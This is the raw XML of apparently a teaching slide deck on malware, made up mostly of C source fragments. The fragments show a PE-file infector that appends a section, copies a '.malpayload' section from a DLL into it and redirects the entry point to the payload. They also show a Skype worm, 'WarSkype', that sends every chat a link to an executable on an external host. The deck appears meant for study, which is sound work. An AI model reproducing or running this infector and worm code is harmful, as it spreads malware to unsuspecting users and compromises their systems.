                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> =  the FOA of the old last section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> + aligned file size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NewSection-&gt;PointerToRawData = LastSection-&gt;PointerToRawData +</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Alignment(LastSection-&gt;SizeOfRawData, OptHeader(FileBase)-&gt;FileAlignment);</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9. Recalculate the file size and apply for new space to save the original data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	FileSize = NewSection-&gt;SizeOfRawData + NewSection-&gt;PointerToRawData;</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FileBase = (DWORD)realloc((VOID*)FileBase, FileSize);</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11. Set SizeOfImage = RVA of the new last section + memory size of the new last section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	OptHeader(FileBase)-&gt;SizeOfImage = NewSection-&gt;VirtualAddress + NewSection-&gt;Misc.VirtualSize;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Implementation-Reset Entry </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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327785" y="1197610"/>
            <a:ext cx="9536430" cy="4961890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// Reset OEP</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VOID SetOEP()</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 Before modifying the original OEP, save the OEP</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ShareData-&gt;OldOep = OptHeader(FileBase)-&gt;AddressOfEntryPoint;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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 --------------------AddressOfEntryPoint----------------------</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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 new OEP = the offset in the section  + RVA of new section</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OptHeader(FileBase)-&gt;AddressOfEntryPoint = StartOffset +</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GetSection(FileBase, ".malpayload")-&gt;VirtualAddress;</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Implementation-Copy malicious payload</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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332423" y="1351915"/>
            <a:ext cx="11527155" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VOID CopySectionData(LPCSTR SectionName, LPCSTR SrcName)</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 Get the base address of the malicious payload in the virtual space (dll image)</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BYTE* SrcData = (BYTE*)(GetSection(DllBase, SrcName)-&gt;VirtualAddress + DllBase);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 Get the base address of the target section in the file space </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BYTE* DestData = (BYTE*)(GetSection(FileBase, SectionName)-&gt;PointerToRawData + FileBase);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 copy memory</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memcpy(DestData, SrcData, GetSection(DllBase, SrcName)-&gt;SizeOfRawData);</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Implementation-Fix reloc for the dll </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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696085" y="1064895"/>
            <a:ext cx="8799830" cy="5323205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VOID FixReloc()</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DWORD Size = 0, OldProtect = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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 retrieve the relocation table</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auto RealocTable = (PIMAGE_BASE_RELOCATION)</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ImageDirectoryEntryToData((PVOID)DllBase, TRUE, 5, &amp;Size);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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 check if it has variables that need to be relocatable</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while (RealocTable-&gt;SizeOfBlock)</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 fix the relocation info for global or static variables		</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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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 recover the dll characteristics</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OptHeader(FileBase)-&gt;DllCharacteristics = 0x8100;</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Implementation-Get the section address</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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303530" y="1181735"/>
            <a:ext cx="11584940" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PIMAGE_SECTION_HEADER GetSection(DWORD Base, LPCSTR SectionName)</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 1. first section</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auto SectionTable = IMAGE_FIRST_SECTION(NtHeader(Base));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 2. get the number of sections in the section table</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WORD SectionCount = FileHeader(Base)-&gt;NumberOfSections;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 3. Traverse the section table, compare section names, and return the address of the section structure</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for (WORD i = 0; i &lt; SectionCount; ++i)</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 if found, return</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if (!memcmp(SectionName, SectionTable[i].Name, strlen(SectionName) + 1))</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return &amp;SectionTable[i];</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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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return nullptr;</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Malicious Payload</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78" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3667125"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 18909"/>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2"/>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07A7A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4" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313437387d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="915200" y="1840337"/>
            <a:ext cx="10260965" cy="3154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71500">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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To gain unauthorized access to confidential data</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a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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To modify data intergrity</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a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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To attack the availability of the system</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a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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To remove all traces of their intrusions from the system</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="4841875"/>
            <a:ext cx="1157605" cy="16205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Skype is a nice IM that let you to chat or to do VoIP call, so this program is designed to be a spreading vector.  It send url to worm to the found users. It creates a window that wraps the functionality to send url to found users. The users are randomly generated by giving nicknames.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rot="0">
            <a:off x="3240405" y="3036570"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9"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5" name="椭圆 14"/>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1" name="椭圆 20"/>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7" name="文本框 2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8" name="文本框 2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Example</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29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="4697095"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1725" y="4834"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2237" y="4953"/>
              <a:ext cx="8483"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椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1725" y="4834"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="80219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2" name="椭圆 3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3" name="文本框 3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9" name="文本框 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3740" y="5003"/>
              <a:ext cx="6980"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Comparison</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6" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="1376045"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>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8" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1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0" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1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文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1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2" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>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Worms</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 Launch Skype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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113983" y="1111250"/>
            <a:ext cx="11964035" cy="5237480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>void RunSkype(void)</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HKEY hKey;</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char skype_path[MAX_PATH];</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DWORD len = MAX_PATH;</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STARTUPINFO inf_prog;  //Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time.</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PROCESS_INFORMATION info_pr; //Contains information about a newly created process and its primary thread</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int user_ret;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pP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#define ERROR MessageBox(NULL,"I could not find Skype !","Error!",MB_OK|MB_ICONERROR);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ExitProcess(0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pP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 path of skype in registry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if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Skype\\Phone",0, KEY_QUERY_VALUE,&amp;hKey) != ERROR_SUCCESS){</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ERROR</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if(RegQueryValueEx(hKey,"SkypePath",0,NULL,skype_path, &amp;len) != ERROR_SUCCESS)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ERROR</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indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pP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RegCloseKey(hKey);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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Worms-Launch Skype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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648653" y="1022985"/>
            <a:ext cx="10894695" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		memset(&amp;inf_prog,0,sizeof(STARTUPINFO));</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memset(&amp;info_pr,0,sizeof(PROCESS_INFORMATION));</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inf_prog.cb = sizeof(STARTUPINFO);</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inf_prog.dwFlags = STARTF_USESHOWWINDOW;</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inf_prog.wShowWindow = SW_SHOW;</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if(CreateProcess(NULL,skype_path,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,</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NULL,&amp;inf_prog,&amp;info_pr))</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MessageBox(NULL,"Allow this program in skype!","Warning!"</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,MB_OK|MB_ICONWARNING);</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else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ERROR</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Worms-Create a window</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 name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-80010" y="6405245"/>
            <a:ext cx="12438380" cy="602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Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="1005205"/>
            <a:ext cx="7734300" cy="5742940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>void MakeWindow(void)</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WNDCLASS wndcls;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memset(&amp;wndcls,0,sizeof(WNDCLASS));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wndcls.lpszClassName = "WarSkype by [WarGame,#eof]";</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wndcls.lpfnWndProc = SkypeProc;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if(RegisterClass(&amp;wndcls) == 0)</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Answer = CreateWindowEx(0,  // Optional window styles.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wndcls.lpszClassName,  // Window class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"Skype sucks!",              // Window text</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0,                 // Window style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-1, -1, 0, 0,   // Size and position</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(HWND)NULL,  // Parent window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(HMENU)NULL, // Menu</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(HINSTANCE)NULL,  // Instance handle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NULL);  // Additional application data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if(Answer == NULL)</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Worms-Behaviors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 name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-80010" y="6405245"/>
            <a:ext cx="12438380" cy="602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Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50800" y="1143635"/>
            <a:ext cx="12878435" cy="7414895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>LRESULT CALLBACK SkypeProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)</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PCOPYDATASTRUCT SkypeData = NULL;</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DWORD ThreadID;</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char *found_users = NULL,*chat_cmd = NULL,*chat_id = NULL,msg_cmd[256];</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COPYDATASTRUCT cds;</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if(uMsg == SkypeAttach)</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if(lParam == 0)</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SkypeWnd = (HWND)wParam;</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CreateThread(NULL,0,&amp;S3arch,0,0,&amp;ThreadID);</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if(uMsg == WM_COPYDATA)</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if(wParam == SkypeWnd)</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SkypeData=(PCOPYDATASTRUCT)lParam;</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if(SkypeData != NULL)</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if(strstr(SkypeData-&gt;lpData,"CHAT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strtok(SkypeData-&gt;lpData,"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chat_id = strtok(NULL,"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 this will send the url to everybody :)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r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>sprintf(msg_cmd,"CHATMESSAGE %s Check this! http://marx2.altervista.org/surprise.exe",chat_id)</a:t>
            </a:r>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pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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cds.dwData= 0;</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cds.lpData= msg_cmd;</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cds.cbData= strlen(msg_cmd)+1;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r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&amp;cds);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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00463542 -0.433796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="7" y="-2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010" y="6405245"/>
            <a:ext cx="12438380" cy="602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2210435" y="1004570"/>
            <a:ext cx="8439785" cy="5662295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>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Worms-Behaviors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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1160145" y="1053465"/>
            <a:ext cx="11515090" cy="5657215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
